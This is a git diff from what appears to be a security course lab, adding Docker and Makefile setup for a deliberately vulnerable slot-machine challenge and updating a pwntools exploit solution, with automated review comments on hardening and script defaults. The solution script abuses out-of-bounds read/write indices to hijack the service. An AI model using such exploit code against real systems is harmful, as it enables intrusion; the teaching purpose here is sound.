diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Dockerfile b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Dockerfile
new file mode 100644
index 0000000..2c28e2f
--- /dev/null
+++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Dockerfile
@@ -0,0 +1,21 @@
+# Stage 1: Build Stage
+FROM gcc:latest AS build
+
+WORKDIR /app
+
+COPY rwslotmachine1.c .
+COPY Makefile.sol Makefile
+
+RUN make
+
+# Stage 2: Runtime Stage
+FROM ubuntu:latest
+
+WORKDIR /app
+
+COPY --from=build /app/rwslotmachine1 /app/rwslotmachine1
+
+EXPOSE 31344
+
+# Run the application
+CMD ["./rwslotmachine1"]
diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Makefile b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Makefile
new file mode 100644
index 0000000..29467e2
--- /dev/null
+++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Makefile
@@ -0,0 +1,19 @@
+IMAGE_NAME = ransomware1
+CONTAINER_NAME = ransomware1_container
+PORT = 31344
+
+# Build the Docker image
+build:
+ docker build -t $(IMAGE_NAME) .
+
+# Run the Docker container
+run:
+ docker run -it --rm -p $(PORT):$(PORT) --name $(CONTAINER_NAME) $(IMAGE_NAME)
+
+# Stop the Docker container
+stop:
+ docker stop $(CONTAINER_NAME)
+
+# Clean up the Docker image
+clean:
+ docker rmi $(IMAGE_NAME)
diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Makefile.sol b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Makefile.sol
new file mode 100644
index 0000000..bc71ca9
--- /dev/null
+++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Makefile.sol
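Review bot: Both base images are floating tags (`FROM gcc:latest AS build`, `FROM ubuntu:latest`), so the challenge binary and the libc it runs against change whenever the tags move, and a solution that relies on fixed addresses (the sibling sol_no_nx.py comments say solution 1 only works against the container) can silently stop reproducing; pin both, e.g. `FROM gcc:<pinned-version> AS build` and `FROM ubuntu:<pinned-version>`. The binary is built dynamically linked in one distribution's image and run on another, which can fail at startup if the runtime image ships an older glibc than the build image — this depends on what the two tags currently resolve to, so verify by running the container once. The runtime stage has no `USER` directive, so the deliberately exploitable service runs as root inside the container; add an unprivileged account before `CMD`, e.g. `RUN useradd -r -s /usr/sbin/nologin ctf` followed by `USER ctf`.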
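Review bot: `IMAGE_NAME = ransomware1` and `CONTAINER_NAME = ransomware1_container` do not match the activity directory (01-rwslotmachine1) or the binary the Dockerfile builds, which looks like a copy-paste from another exercise and will collide with any other lab that builds an image of that name; rename to `IMAGE_NAME = rwslotmachine1` and `CONTAINER_NAME = rwslotmachine1_container`. The `run` target publishes the intentionally vulnerable service on every host interface with `-p $(PORT):$(PORT)`; bind it to loopback unless remote access is actually wanted, `-p 127.0.0.1:$(PORT):$(PORT)`. None of the targets is declared phony, so a file named `build`, `run`, `stop` or `clean` in the directory would turn them into no-ops; add `.PHONY: build run stop clean` at the top.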
@@ -0,0 +1,13 @@
+CC = gcc
+CFLAGS = -Wall -Wextra -O2
+
+TARGET = rwslotmachine1
+SRC = rwslotmachine1.c
+
+all: $(TARGET)
+
+$(TARGET): $(SRC)
+ $(CC) $(CFLAGS) -o $(TARGET) $(SRC)
+
+clean:
+ rm -f $(TARGET)
diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py
index 40d3c52..e2eab64 100644
--- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py
+++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py
@@ -1,6 +1,6 @@
 from pwn import *
-local = False
+local = True
 # Both solutions work against the Docker container instance.
 # Only solution 2 works locally.
 # Solution 1 fails on the local machine because there is no valid address at that index.
@@ -13,21 +13,23 @@ def do_read(idx):
- p.recvuntil(">")
- p.sendline("1")
- p.recvuntil("index:")
- p.sendline(str(idx))
- p.recvuntil("]: ")
- return int(p.recvuntil("\n")[:-1], 16)
+ p.recvuntil(b">")
+ p.sendline(b"1")
+ p.recvuntil(b"index:")
+ p.sendline(str(idx).encode())
+ p.recvuntil(b"]: ")
+ leak = p.recvline().strip()
+ print(f"Raw Leak: {leak}")
+ return int(leak, 16)
 def do_write(idx, value):
- p.recvuntil(">")
- p.sendline("2")
- p.recvuntil("index:")
- p.sendline(str(idx))
- p.recvuntil("value:")
- p.sendline(hex(value))
+ p.recvuntil(b">")
+ p.sendline(b"2")
+ p.recvuntil(b"index:")
+ p.sendline(str(idx).encode())
+ p.recvuntil(b"value:")
+ p.sendline(hex(value).encode())
 if SOLUTION == 1:
@@ -45,4 +47,4 @@ def do_write(idx, value):
 do_write(-8, stack_slots)
-p.interactive()
+p.interactive()
\ No newline at end of file
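Review bot: `CFLAGS = -Wall -Wextra -O2` sets no hardening-related flag at all, so whether NX, PIE, stack protector and RELRO end up on or off is whatever the `gcc:latest` toolchain defaults to on the day the image is built, while the accompanying solution is named sol_no_nx.py and so assumes a specific mitigation state; that assumption is implicit here and will drift with the compiler image. State the intended flags explicitly and explain them in a comment above `CFLAGS`, along the lines of `# Mitigation flags are deliberate for this activity: list which ones are expected on/off so sol_no_nx.py reproduces against this build`. `all` and `clean` are not declared phony; add `.PHONY: all clean`.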
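Review bot: The committed default is now `local = True`, but the comment block directly below it says only solution 2 works locally and that both work against the container, which this same commit adds a Dockerfile and Makefile for, so the default now points at the environment in which part of the script is documented not to work; this reads like a debugging toggle that was committed by accident. Since the file already does `from pwn import *`, consider `local = bool(args.LOCAL)` so the target is chosen on the command line (`python3 sol_no_nx.py LOCAL`) and the checked-in default stays the container.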
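Review bot: `print(f"Raw Leak: {leak}")` in do_read is debugging output written to the solution's stdout where it interleaves with the interactive session; route it through the pwntools logger, `log.debug("raw leak: %r", leak)`, so it only appears with DEBUG. `int(leak, 16)` on the next line has no guard: if the service answers an out-of-range index with anything other than a hex number (its error format is not visible in this diff, so this is inferred), the script dies with a bare ValueError that does not say which index failed; wrapping it as `try: return int(leak, 16)` / `except ValueError: log.error("unexpected reply for index %d: %r", idx, leak)` makes the failure self-explanatory. The `def do_read(idx):` signature lies outside the hunk and appears only in its header.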